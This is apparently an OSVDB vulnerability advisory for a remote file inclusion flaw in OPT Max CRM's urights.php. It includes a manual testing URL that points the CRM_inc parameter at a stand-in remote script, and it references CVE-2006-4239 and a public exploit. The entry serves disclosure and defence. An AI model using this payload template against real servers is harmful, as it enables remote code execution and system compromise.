OPT Max urights.php CRM_inc urights.php Variable Remote File Inclusion

2006-08-16T07:34:00
ID OSVDB:27972
Type osvdb
Reporter OSVDB
Modified 2006-08-16T07:34:00

Description

Manual Testing Notes

http://[target]/[opt_path]/include/urights.php?CRM_inc=[evil_scripts.txt]

References:

Vendor URL: http://sourceforge.net/projects/outreach Secunia Advisory ID:21517 Generic Exploit URL: http://milw0rm.com/exploits/2192 FrSIRT Advisory: ADV-2006-3296 CVE-2006-4239 Bugtraq ID: 19548